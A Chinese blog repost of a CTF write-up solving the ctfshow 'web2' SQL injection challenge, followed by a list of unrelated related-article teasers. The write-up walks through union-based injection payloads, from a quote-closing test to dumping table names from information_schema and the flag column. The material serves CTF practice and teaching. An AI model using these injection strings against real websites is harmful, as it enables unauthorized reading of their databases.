ctfshow-web2

news2024/12/27 4:51:24

0x00 前言

  • CTF 加解密合集
  • CTF Web合集

0x01 题目

最简单的SQL注入

0x02 Write Up

这道题很多wp,但是为了完整性还是写一下

在这里插入图片描述
知道这里是sql注入,确认一下是什么类型的闭合

使用a' or 1=1 #进行测试

在这里插入图片描述

可以知道闭合是单引号闭合,然后查一下显示的位数

a' union select 1,2,3 #

在这里插入图片描述

然后查一下数据库

a' union select 1,database(),3  #

在这里插入图片描述
然后知道库了之后,锁定一下数据表

a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database();#

在这里插入图片描述

然后查一下数据

a' union select 1,falg,3 from web2.flag#

在这里插入图片描述

以上

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/787897.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

openGauss学习笔记-20 openGauss 简单数据管理-DISTINCT

openGauss学习笔记-20 openGauss 简单数据管理-DISTINCT

文章目录 openGauss学习笔记-20 openGauss 简单数据管理-DISTINCT20.1 语法格式20.2 参数说明20.3 示例 openGauss学习笔记-20 openGauss 简单数据管理-DISTINCT DISTINCT关键字与SELECT语句一起使用,用于去除重复记录,只获取唯一的记录。 当一个表中有…
阅读更多...
【python中级】 base64编码将图片数据转化为成字符串

【python中级】 base64编码将图片数据转化为成字符串

【python中级】 base64编码将图片数据转化为成字符串 1、背景2、图片base64编码1、背景 在Qt编程的时候,有的地方比如logo需要加载图片,在程序打包之后,需要将图片拷贝进项目。 能不能将图片转化成一串字符串,使用该字符串代替图像地址。 即这样就可以字符串变量的形式编…
阅读更多...
Terraform学习日记-AWS-EC2

Terraform学习日记-AWS-EC2

terraform install https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli 这里我们使用 aws-linux-2022 作为执行环境 # sudo yum install -y yum-utils# sudo yum-config-manager --add-repo https://rpm.releases.hashicorp.com/AmazonLinux/…
阅读更多...
选择合适的图表,高效展现数据魅力

选择合适的图表,高效展现数据魅力

随着大数据时代的来临,数据的重要性愈发凸显,数据分析和可视化成为了决策和传递信息的重要手段。在数据可视化中,选择合适的图表是至关重要的一环,它能让数据更加生动、直观地呈现,为观众提供更有说服力的信息。本文将…
阅读更多...
从娱乐产品到效率工具,ARknovv首款AR眼镜回归“AR本质”

从娱乐产品到效率工具,ARknovv首款AR眼镜回归“AR本质”

如果说2022年是AR的元年,2023年则有望成为消费级AR眼镜的新拐点。 今年AR眼镜行业发展明显加快,且不断有大厂入局:今年2月小米发布无线AR眼镜探索版;3月荣耀也推出了一款全新的观影眼镜;而苹果在6月发布的MR头显Visio…
阅读更多...
【java】2208. 将数组和减半的最少操作次数

【java】2208. 将数组和减半的最少操作次数

给你一个正整数数组 nums 。每一次操作中,你可以从 nums 中选择 任意 一个数并将它减小到 恰好 一半。(注意,在后续操作中你可以对减半过的数继续执行操作) 请你返回将 nums 数组和 至少 减少一半的 最少 操作数。 示例 1&#…
阅读更多...
Android性能优化之游戏的Theme背景图

Android性能优化之游戏的Theme背景图

近期,对游戏的内存优化,通过内存快照发现,某个Activity的theme背景图 占用3M 多。考虑着手对齐进行优化。 问题 查看游戏中的内存快照,发现有一个图片bitmap 占用3M 多,设置在Activity的背景中: 查看Phon…
阅读更多...
用户档案与用户画像:很容易混淆

用户档案与用户画像:很容易混淆

用户档案与用户画像:很容易混淆 需求分析或设计需要梳理 趣讲大白话:搞清楚怎么来,才能用好 【趣讲信息科技236期】 **************************** User Profile,不知道谁提出来的。被译为用户档案或用户简要,它是基于…
阅读更多...
一篇文章搞定《APP的启动流程》

一篇文章搞定《APP的启动流程》

一篇文章搞定《APP的启动流程》 前言冷启动、温启动、热启动启动中的重要成员简介zygote进程InstrumentationSystemServer进程ActivityManagerServiceBinderActivityThread 启动的步骤详解一、点击桌面图标二、创建进程三、初始化APP进程四、APP进程与System_server的绑定五、初…
阅读更多...
《深度解析Docker与微服务架构:构建灵活可扩展的现代应用》

《深度解析Docker与微服务架构:构建灵活可扩展的现代应用》

🌷🍁 博主 libin9iOak带您 Go to New World.✨🍁 🦄 个人主页——libin9iOak的博客🎐 🐳 《面试题大全》 文章图文并茂🦕生动形象🦖简单易学!欢迎大家来踩踩~&#x1f33…
阅读更多...
【SQL语句复习】第1-2章

【SQL语句复习】第1-2章

SQL复习 学习目标:复习SQL语句 学习地址:https://linklearner.com/learn/detail/70 第一章 初始数据库 数据库是将大量数据保存起来,通过计算机加工而成的可以进行高效访问的数据集合。该数据集合称为数据库(Database&#xf…
阅读更多...
大学生用一周时间给麦当劳做了个App(Vue版)

大学生用一周时间给麦当劳做了个App(Vue版)

背景 有个大学生粉丝最近私信联系我,说基于我之前开源的多语言项目做了个仿麦当劳的项目,虽然只是个样子货,但是收获颇多,希望把自己写的代码开源出来供大家一起学习进度。这个小伙伴确实是非常积极上进,很多大学生&a…
阅读更多...
C盘空间不足:解决办法完整教程

C盘空间不足:解决办法完整教程

当C盘空间不足时,你可以尝试以下几种解决方案: 1. 清理临时文件:使用Windows自带的磁盘清理工具,可以删除临时文件、回收站中的文件和其他不必要的系统文件,释放一些空间,推荐使用工具分区助手。 2. 卸载不…
阅读更多...
数据库版本管理工具Flyway入门实战

数据库版本管理工具Flyway入门实战

From version control to continuous delivery, Flyway helps individuals, teams, and enterprises build on application delivery processes to automate database development. 1.引言 在项目开发中,一直在探索如何进行数据库的版本管理。关注的公众号推送了…
阅读更多...
踩坑 视觉SLAM 十四讲第二版 ch8 编译及运行问题

踩坑 视觉SLAM 十四讲第二版 ch8 编译及运行问题

1.fmt相关 CMakeLists.txt中&#xff1a;在后面加上 fmt target_link_libraries(optical_flow ${OpenCV_LIBS} fmt ) target_link_libraries(direct_method ${OpenCV_LIBS} ${Pangolin_LIBRARIES} fmt )2.不存在用户定义的从 "std::_Bind<void (OpticalFlowTracker::…
阅读更多...
动态内存管理函数的使用与优化技巧(内存函数、柔性数组)

动态内存管理函数的使用与优化技巧(内存函数、柔性数组)

目录 前言 一、动态内存函数 为什么存在动态内存分配 动态内存函数介绍 malloc和free calloc realloc 常见的错误 经典笔试题目 二、C/C程序的内存开辟 三、柔性数组 柔性数组的特点&#xff1a; 柔性数组的使用 柔性数组的优势 前言 动态内存管理函数是C语言中非常重要的一部…
阅读更多...
Verilog 学习之路(三)——牛客刷题篇

Verilog 学习之路(三)——牛客刷题篇

1.输入序列连续的序列检测 题面 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kJH9kHFH-1690301233803)(https://s2.loli.net/2023/07/26/HJPXR2mhbaVCG6d.png)]思路 对于序列检测题目&#xff0c;常规的解法有两种&#xff1a;状态机法和序列缓存…
阅读更多...
需求管理全过程流程图及各阶段核心关注点详解

需求管理全过程流程图及各阶段核心关注点详解

分析报告指出&#xff0c;多达76%的项目失败是因为差劲的需求管理&#xff0c;这个是项目失败的最主要原因&#xff0c;比落后的技术、进度失控或者混乱的变更管理还要关键。很多项目往往在开始的时候已经决定了失败&#xff0c;谜底就在谜面上&#xff0c;开始就注定的失败&am…
阅读更多...
python-基本数据类型

python-基本数据类型

hello&#xff0c;这里是Token_w的文章&#xff0c;主要讲解python的基础学习&#xff0c;希望对大家有所帮助 整理不易&#xff0c;感觉还不错的可以点赞收藏评论支持&#xff0c;感谢&#xff01; 有没有一个人&#xff0c;你想给TA传个小纸条&#xff1f;用恺撒密码一展身手…
阅读更多...
【Docker】Docker Compose的配置与部署

【Docker】Docker Compose的配置与部署

文章目录 一、Docker Compose1. Docker Compose 的概述2. Docker Compose 三大的概念3. Docker Compose 环境安装 二、YAML 文件格式及编写注意事项1. YAML 文件格式2. YAML 格式的注意事项3. YAML 数据结构3.1 基本类型3.2 实例3.3 YAML 特殊类型文本块锚点与引用 三、Docker …
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023